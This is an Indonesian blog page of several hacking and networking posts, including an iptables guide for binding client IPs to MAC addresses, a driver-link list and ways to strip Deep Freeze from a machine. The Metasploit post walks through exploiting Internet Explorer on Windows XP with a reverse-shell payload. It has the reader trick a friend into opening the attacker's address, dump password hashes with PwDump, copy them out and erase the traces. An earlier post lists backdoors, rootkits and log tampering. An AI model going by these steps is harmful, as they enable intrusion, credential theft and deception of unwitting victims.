Loading Pencarian

Hacking Pemula

Posted by samcro on Saturday, June 25, 2011

Hacking Pemula

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.
Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.
Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.
Hacking buat pemula
- by aCh
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking

Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget
2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password.
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….
3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!
Referensi :
-Hacking and Defense, Jim Geovedi, negative@magnesium.net
-Network Defense, Jim Geovedi, negative@magnesium.net

Proteksi IP Dari Client Yang Suka Ganti - Ganti IP

Posted by samcro




Kadang kita sebagai administrator suatu jaringan sangat dipusingkan dengan beberapa client “nakal” yang suka berganti-ganti IP Address. Padahal sebelumnya suatu IP Address tertentu dari client sudah kita blok aksesnya untuk jam-jam tertentu, atau kita blok untuk mengakses suatu situs tertentu.
Mungkin sedikit yang bisa saya berikan disini adalah, bagaimana kita dapat mengatasi “kenakalan” client-client tersebut agar tidak bisa mengganti IP Address mereka secara “enaknya saja”. Saya harapkan Anda paling tidak sudah tahu apa itu IP Address dan apa itu MAC Address. Dalam melakukan percobaan disini saya menggunakan Linux distro ClarkConnect Home Edition versi 3.0 yang dilengkapi dengan iptables versi 1.2.11. Rekan-rekan dapat menggunakan distro Linux lainnya.

Keuntungan dan kerugian :

* Keuntungan yang didapatkan adalah, kita dapat dengan mudah memonitor “pergerakan” client dan melakukan logging untuk administrasi jaringan atau analisa-analisa lain yang diperlukan, karena client tidak dapat melakukan perubahan IP Address.
* Kerugian, seandainya saja interface hardware milik client mengalami kerusakan dan melakukan pergantian, kita harus melakukan konfigurasi ulang rules firewall kita berdasarkan MAC Address yang baru. Tapi kerusakan ini sangat jarang terjadi. Ada 2 metode yang saya gunakan disini dan dapat rekan-rekan sekalian pilih salah satunya, yaitu :

* Pertama, apakah kita akan melakukan pendaftaran semua IP Address dan MAC Address client-client kita dan tidak memperkenankan semua client yang terhubung dengan kita tidak dapat berganti-ganti IP Address. Jika IP dan MAC Address tidak terdaftar didalam rules firewall, maka client tidak dapat melakukan koneksi.
* Kedua, apakah kita hanya menginginkan IP Address dan MAC Address tertentu saja yang tidak kita inginkan untuk berganti-ganti IP Address. Disini, jika ada IP baru dan dengan MAC Address baru, client tetap dapat melakukan koneksi.

Kasus, disini kita mempunya 3 client, yaitu :
IP Client 1 = 192.168.1.5
MAC Address 1 = 00:89:CD:64:01:EF

IP Client 2 = 192.168.1.20
MAC Address 1 = 00:90:DD:14:11:CF


IP Client 3 = 192.168.1.14
MAC Address 3 = 00:40:EE:21:26:GE


Semua client terkoneksi melalui ethernet (LAN Card/NIC) 1 yang diberi nama eth1.

Firewalling dengan metode pertama :

#drop semua prerouting di eth1
iptables -I PREROUTING -t nat -i eth1 -j DROP

#——————- client pertama————————
#accept IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF

iptables -I PREROUTING -t nat -i eth1 -s 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j ACCEPT
#drop IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I FORWARD -i eth1 -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#drop prerouting IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I PREROUTING -t nat -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#——————- client kedua————————
#accept IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF

iptables -I PREROUTING -t nat -i eth1 -s 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j ACCEPT

#drop IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I FORWARD -i eth1 -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

#drop prerouting IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I PREROUTING -t nat -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

Catatan :
Disini karena client 3 tidak masuk kedalam rules, maka tidak dapat melakukan koneksi, walaupun berganti IP Address yang sama dengan client 1 dan 2. Sedangkan client 1 dan 2 tetap dapat melakukan koneksi, selama tidak melakukan perubahan IP Address.

Firewalling dengan metode kedua :

#——————- client pertama————————
#drop IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I FORWARD -i eth1 -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#drop prerouting IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I PREROUTING -t nat -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#——————- client kedua————————
#drop IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I FORWARD -i eth1 -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

#drop prerouting IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I PREROUTING -t nat -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

Catatan :
Disini walaupun client 3 tidak masuk kedalam rules, tetap dapat melakukan koneksi, walaupun berganti IP Address asal tidak sama IP Addressnya dengan client 1 dan 2. Client 1 dan 2 tetap dapat melakukan koneksi, selama tidak melakukan perubahan IP Address.

Sampai disini rekan-rekan sekalian dapat mengembangkannya, mungkin dengan membatasi besar bandwith IP Address tertentu milik client, atau hanya dapat melakukan browsing namun tidak dapat melakukan chatting dalam waktu-waktu tertentu.

Belajar Hack Yuck! (3) - Hack Windows XP SP2

Posted by samcro

Belajar Hack Yuck! (3) - Hack Windows XP SP2


*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
main1.JPG
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
exploit1.JPG
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.
Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
pwdump.JPG
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
dump1.JPG
Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
clean.JPG
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking…..
Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Download driver hardware

Posted by samcro


Halah-halah kemaren jam 12 malem gue diminta tolong buat nyari in driver motherboard (katanya seh darurat) dan harus dapet, soale drivernya ketinggalan ditoko dan besok pagi tuh komputer harus dah siap (kasian juga neh….)
Tapi bagaimanapun tidak ada pencarian yang sia-sia. Karena disamping dapet nolong teman. Ternyata aku dapet juga link-link hardware Drivers, lumayan lah buat koleksi. Beberapa diantaranya adalah:
Software drivers untuk lebih dari
25,000 hardware components
from brands such as Dell, HP, Compaq, IBM, Sony, Toshiba, Panasonic,
as well as hardware component manufacturers Intel,
3Com, VIA, nVidia, ATI, SoundMax.

DIGITAL GRAPHICS DRIVER FOR ALL MOTHERBOARD
It Supports (setups) the following motherboards
ALL MERCURY MOTHERDS
ALL VIA MOTHERBOARDS
ALL INTEL CHIPSET MOTHERBOARDS
ALL INTEL DESKTOP BOARDS
ALL SIS MOTHERBOARDS

Support Driver links:
http://www.drivers.com
http://www.amptron.com
http://www.mrdriver.com
http://www.pcdrivers.com
http://www.drivershq.com
http://www.driverzone.com
http://www.windrivers.com
http://www.helpdrivers.com
http://www.voodoofiles.com
http://www.driverforum.com
http://www.driverguide.com (User:drivers Password:all)
http://www.driversearch.com
http://www.driverupdate.com
http://www.video-drivers.com
http://www.driversplanet.com
http://www.perfectdrivers.com
http://www.totallydrivers.com
http://www.windowsxp-drivers.com
http://www.galttech.com/drivers.shtml
http://www.bioscentral.com

----- factory drivers
http://www.abit.com (Abit)
http://www.acer.com (Acer)
http://www.amd.com (Advanced Micro Devices - AMD)
http://www.agfa.com (Agfa)
http://www.albatron.com.tw (Albatron)
http://www.megatrends.com (American Megatrends - AMI)
http://www.apple.com (Apple)
http://www.aopen.com (A-Open)
http://www.asus.com (Asus)
http://www.ati.com (ATI Technologies)
http://www.cisco.com (Cisco Systems)
http://www.compaq.com (Compaq)
http://www.creative.com (Creative)
http://www.dell.com (Dell)
http://www.epox.com (Epox)
http://www.epson.com (Epson)
http://www.fujitsu.com (Fujitsu)
http://www.gigabyte.com (Gigabyte)
http://www.hp.com (Hewlett Packard)
http://www.ibm.com (IBM)
http://www.intel.com (Intel)
http://www.kodak.com (Kodak)
http://www.lexmark.com (Lexmark)
http://www.lge.com (LG)
http://www.logitech.com (Logitech)
http://www.matrox.com (Matrox)
http://www.maxtor.com (Maxtor)
http://www.msicomputer.com (MSI)
http://www.nvidia.com (Nvidia)
http://www.quantum.com (Quantum)
http://www.seagate.com (Seagate)
http://www.samsung.com (Samsung)
http://www.sis.com (SIS)
http://www.soyo.com (Soyo)
http://www.toshiba.com (Toshiba)
http://www.umax.com (Umax)
http://www.usrobotics.com (US Robotics)
http://www.wdc.com (Western Digital)
http://www.xerox.com (Xerox)
http://www.canon.com (Canon)


DVD Drivers
http://www.cdrom-drivers.com/


Graphics Drivers
http://www.video-drivers.com/

Input Drivers
http://www.input-drivers.com/

Modem Drivers
http://www.modem-drivers.com/

Monitor Drivers
http://www.monitor-drivers.com/

Mouse Drivers
http://www.input-drivers.com/

Network Drivers
http://www.network-drivers.com/

Plotter Drivers
http://www.printer-drivers.com/

Windows XP Drivers
http://www.windowsxp-drivers.com/

Printer Drivers
http://www.printer-drivers.com/

Scanner Drivers
http://www.scanner-drivers.com/

Sound Drivers
http://www.soundcard-drivers.com/

Storage Drivers
http://www.storagedrivers.com/

USB Drivers
http://www.usb-drivers.com/

Video Drivers
http://www.video-drivers.com/
Cool
Banyak juga yah ternyata....
Bagi yang butuh driver, coba saja kunjungi web diatas siapa tahu aja dapat....
Good luck

Seribu Cara Habisi Deep Freeze

Posted by samcro


Seribu Cara Habisi Deep Freeze

Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.
Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.
============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.
============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot

============Pake PE Builder (Live CD Windows)=============
Cara yang satu ini saya kutip dari Wikianswer. Aplikasi yag harus disiapkan adalah PE Builder. Anda bisa mendapatkannya di sini. Selain itu, anda membutuhkan file instalasi Windows (XP Home/ Pro dengan minimal SP 1 atau Server 2003).
Langkah-langkah yang harus dilakukan cukup panjang. Pertama-tama, kita harus membuat CD Startup Windows.
1. Pastikan sistem memiliki ruang kosong 500 MB.
2. Copy file instalasi Windows ke folder khusus di Harddisk.
3. Install PE Builder, lalu jalankan aplikasi ini.
4. Setelah menyetujui License Agreement, akan muncul tampilan utama PE Builder.
5. Masukkan lokasi file instalasi Windows.
6.Pada dialog PE Builder, pilih opsi “Burn CD/DVD”. Ketika anda menggunakan CD RW (bisa dihapus), pastikan bahwa pilihan “AutoErase RW” diaktifkan. Pilihan “burn using” harus diset ke “StarBurn”. Kalau anda ingin CD otomatis dikeluarkan setelah proses burning selesai, centangi “Eject after burn”. Pilih cd writer anda dari daftar device.
7. klik “build”. PE builder akan meminta ijin membuat direktori BartPE, jawab Yes.
8. Lisensi dari Microsoft Windows tampil. Baca dan pilih agree untuk melanjutkan.
9. Tunggu sampai selesai.
Langkah selajutnya, silakan retart komputer dan masuk ke BIOS. Ubah urutan booting agar boot melalui CD. Setelah masuk ke live CD Windows, lakukan langkah-berikut.
1. Jalankan regedit.
2. Buka menu Find dan masukkan “UpperFilters”. Jangan lupa centangi “only the Values”.
3. Jika telah ditemukan, lihat apakah terdapat baris yang mencantumkan driver Deep Freeze (DeepFrz atau DepFrzLo) lalu hapus. hapis juga baris untuk ThawSpace (ThwSpace), biarkan sisanya. Tekan F3 untuk melanjutkan pencarian dan ulangi proses diatas sampai value UpperFilters tidak ada di key HKLM\MySystem.
4. Tuju ke HKLM\MySystem\Select lalu buka value bernama Default. Di sini terdapat key untuk control set yang akan digunakan system saat booting. Jika nilainya 1 maka akan tertulis ControlSet001, jika 2 akan tertulis ControlSet002, dst. Ingat control set itu
5. Lalu tuju ke HKLM\MySystem\ControlSetXXX(sesuai default)\Services lalu hapis key yang bernama driver Deep Freeze (DeepFrz atau DepFrzLo dan DepFrzHi). Lalu hapus juga driver ThawSpace (ThwSpace).
6. Reboot system secara normal.
7. Selesai sudah.
Bila ada langkah-langkah yang kurang jelas, silakan periksa referensi.

Total Tayangan Laman